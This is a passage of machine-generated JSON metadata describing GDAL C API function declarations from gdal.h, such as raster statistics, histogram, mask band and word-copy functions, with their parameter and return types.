0, "location": "/usr/include/gdal/gdal.h:799:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetBandDataset", "ns": 0, "location": "/usr/include/gdal/gdal.h:800:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }], "return-type": { "tag": "GDALDatasetH" } }, { "tag": "function", "name": "GDALGetRasterColorInterpretation", "ns": 0, "location": "/usr/include/gdal/gdal.h:803:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }], "return-type": { "tag": "GDALColorInterp" } }, { "tag": "function", "name": "GDALSetRasterColorInterpretation", "ns": 0, "location": "/usr/include/gdal/gdal.h:805:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALColorInterp" } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetRasterColorTable", "ns": 0, "location": "/usr/include/gdal/gdal.h:806:37", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }], "return-type": { "tag": "GDALColorTableH" } }, { "tag": "function", "name": "GDALSetRasterColorTable", "ns": 0, "location": "/usr/include/gdal/gdal.h:807:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALColorTableH" } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALHasArbitraryOverviews", "ns": 0, "location": "/usr/include/gdal/gdal.h:808:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetOverviewCount", "ns": 0, "location": "/usr/include/gdal/gdal.h:809:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetOverview", "ns": 0, "location": "/usr/include/gdal/gdal.h:810:37", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "GDALRasterBandH" } }, { "tag": "function", "name": "GDALGetRasterNoDataValue", "ns": 0, "location": "/usr/include/gdal/gdal.h:811:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "GDALSetRasterNoDataValue", "ns": 0, "location": "/usr/include/gdal/gdal.h:812:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALDeleteRasterNoDataValue", "ns": 0, "location": "/usr/include/gdal/gdal.h:813:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetRasterCategoryNames", "ns": 0, "location": "/usr/include/gdal/gdal.h:814:29", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "function", "name": "GDALSetRasterCategoryNames", "ns": 0, "location": "/usr/include/gdal/gdal.h:815:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetRasterMinimum", "ns": 0, "location": "/usr/include/gdal/gdal.h:816:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "pbSuccess", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "GDALGetRasterMaximum", "ns": 0, "location": "/usr/include/gdal/gdal.h:817:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "pbSuccess", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "GDALGetRasterStatistics", "ns": 0, "location": "/usr/include/gdal/gdal.h:818:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "bApproxOK", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "bForce", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pdfMin", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "pdfMax", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "pdfMean", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "pdfStdDev", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALComputeRasterStatistics", "ns": 0, "location": "/usr/include/gdal/gdal.h:821:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "bApproxOK", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pdfMin", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "pdfMax", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "pdfMean", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "pdfStdDev", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "pfnProgress", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "pProgressData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALSetRasterStatistics", "ns": 0, "location": "/usr/include/gdal/gdal.h:825:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "dfMin", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfMax", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfMean", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfStdDev", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetRasterUnitType", "ns": 0, "location": "/usr/include/gdal/gdal.h:829:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "GDALSetRasterUnitType", "ns": 0, "location": "/usr/include/gdal/gdal.h:830:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "pszNewValue", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetRasterOffset", "ns": 0, "location": "/usr/include/gdal/gdal.h:831:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "pbSuccess", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "GDALSetRasterOffset", "ns": 0, "location": "/usr/include/gdal/gdal.h:832:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "dfNewOffset", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetRasterScale", "ns": 0, "location": "/usr/include/gdal/gdal.h:833:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "pbSuccess", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "GDALSetRasterScale", "ns": 0, "location": "/usr/include/gdal/gdal.h:834:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "dfNewOffset", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALComputeRasterMinMax", "ns": 0, "location": "/usr/include/gdal/gdal.h:836:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "bApproxOK", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "adfMinMax", "type": { "tag": ":array", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "size": 2 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALFlushRasterCache", "ns": 0, "location": "/usr/include/gdal/gdal.h:838:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetRasterHistogram", "ns": 0, "location": "/usr/include/gdal/gdal.h:839:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "dfMin", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfMax", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "nBuckets", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "panHistogram", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "bIncludeOutOfRange", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "bApproxOK", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pfnProgress", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "pProgressData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetRasterHistogramEx", "ns": 0, "location": "/usr/include/gdal/gdal.h:845:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "dfMin", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfMax", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "nBuckets", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "panHistogram", "type": { "tag": ":pointer", "type": { "tag": "GUIntBig" } } }, { "tag": "parameter", "name": "bIncludeOutOfRange", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "bApproxOK", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pfnProgress", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "pProgressData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetDefaultHistogram", "ns": 0, "location": "/usr/include/gdal/gdal.h:851:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "pdfMin", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "pdfMax", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "pnBuckets", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "ppanHistogram", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } } }, { "tag": "parameter", "name": "bForce", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pfnProgress", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "pProgressData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetDefaultHistogramEx", "ns": 0, "location": "/usr/include/gdal/gdal.h:857:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "pdfMin", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "pdfMax", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "pnBuckets", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "ppanHistogram", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": "GUIntBig" } } } }, { "tag": "parameter", "name": "bForce", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pfnProgress", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "pProgressData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALSetDefaultHistogram", "ns": 0, "location": "/usr/include/gdal/gdal.h:863:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "dfMin", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfMax", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "nBuckets", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "panHistogram", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALSetDefaultHistogramEx", "ns": 0, "location": "/usr/include/gdal/gdal.h:866:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "dfMin", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfMax", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "nBuckets", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "panHistogram", "type": { "tag": ":pointer", "type": { "tag": "GUIntBig" } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetRandomRasterSample", "ns": 0, "location": "/usr/include/gdal/gdal.h:870:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetRasterSampleOverview", "ns": 0, "location": "/usr/include/gdal/gdal.h:872:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "GDALRasterBandH" } }, { "tag": "function", "name": "GDALGetRasterSampleOverviewEx", "ns": 0, "location": "/usr/include/gdal/gdal.h:874:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "", "type": { "tag": "GUIntBig" } }], "return-type": { "tag": "GDALRasterBandH" } }, { "tag": "function", "name": "GDALFillRaster", "ns": 0, "location": "/usr/include/gdal/gdal.h:875:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "dfRealValue", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfImaginaryValue", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALComputeBandStats", "ns": 0, "location": "/usr/include/gdal/gdal.h:878:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "nSampleStep", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pdfMean", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "pdfStdDev", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "pfnProgress", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "pProgressData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALOverviewMagnitudeCorrection", "ns": 0, "location": "/usr/include/gdal/gdal.h:882:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBaseBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "nOverviewCount", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pahOverviews", "type": { "tag": ":pointer", "type": { "tag": "GDALRasterBandH" } } }, { "tag": "parameter", "name": "pfnProgress", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "pProgressData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetDefaultRAT", "ns": 0, "location": "/usr/include/gdal/gdal.h:888:47", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }], "return-type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "function", "name": "GDALSetDefaultRAT", "ns": 0, "location": "/usr/include/gdal/gdal.h:890:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALAddDerivedBandPixelFunc", "ns": 0, "location": "/usr/include/gdal/gdal.h:892:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszName", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "pfnPixelFunc", "type": { "tag": "GDALDerivedPixelFunc" } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetMaskBand", "ns": 0, "location": "/usr/include/gdal/gdal.h:895:37", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }], "return-type": { "tag": "GDALRasterBandH" } }, { "tag": "function", "name": "GDALGetMaskFlags", "ns": 0, "location": "/usr/include/gdal/gdal.h:896:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALCreateMaskBand", "ns": 0, "location": "/usr/include/gdal/gdal.h:898:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "nFlags", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetDataCoverageStatus", "ns": 0, "location": "/usr/include/gdal/gdal.h:930:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "nXOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nYOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nMaskFlagStop", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pdfDataPct", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALARGetNextUpdatedRegion", "ns": 0, "location": "/usr/include/gdal/gdal.h:941:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hARIO", "type": { "tag": "GDALAsyncReaderH" } }, { "tag": "parameter", "name": "dfTimeout", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "pnXBufOff", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "pnYBufOff", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "pnXBufSize", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "pnYBufSize", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "GDALAsyncStatusType" } }, { "tag": "function", "name": "GDALARLockBuffer", "ns": 0, "location": "/usr/include/gdal/gdal.h:944:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hARIO", "type": { "tag": "GDALAsyncReaderH" } }, { "tag": "parameter", "name": "dfTimeout", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALARUnlockBuffer", "ns": 0, "location": "/usr/include/gdal/gdal.h:946:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hARIO", "type": { "tag": "GDALAsyncReaderH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALGeneralCmdLineProcessor", "ns": 0, "location": "/usr/include/gdal/gdal.h:951:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "nArgc", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "ppapszArgv", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } } }, { "tag": "parameter", "name": "nOptions", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALSwapWords", "ns": 0, "location": "/usr/include/gdal/gdal.h:953:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nWordSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nWordCount", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nWordSkip", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALSwapWordsEx", "ns": 0, "location": "/usr/include/gdal/gdal.h:955:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nWordSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nWordCount", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "nWordSkip", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALCopyWords", "ns": 0, "location": "/usr/include/gdal/gdal.h:959:5", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pSrcData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "eSrcType", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "nSrcPixelOffset", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pDstData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "eDstType", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "nDstPixelOffset", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nWordCount", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALCopyBits", "ns": 0, "location": "/usr/include/gdal/gdal.h:966:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pabySrcData", "type": { "tag": ":pointer", "type": { "tag": "GByte" } } }, { "tag": "parameter", "name": "nSrcOffset", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nSrcStep", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pabyDstData", "type": { "tag": ":pointer", "type": { "tag": "GByte" } } }, { "tag": "parameter", "name": "nDstOffset", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDstStep", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": 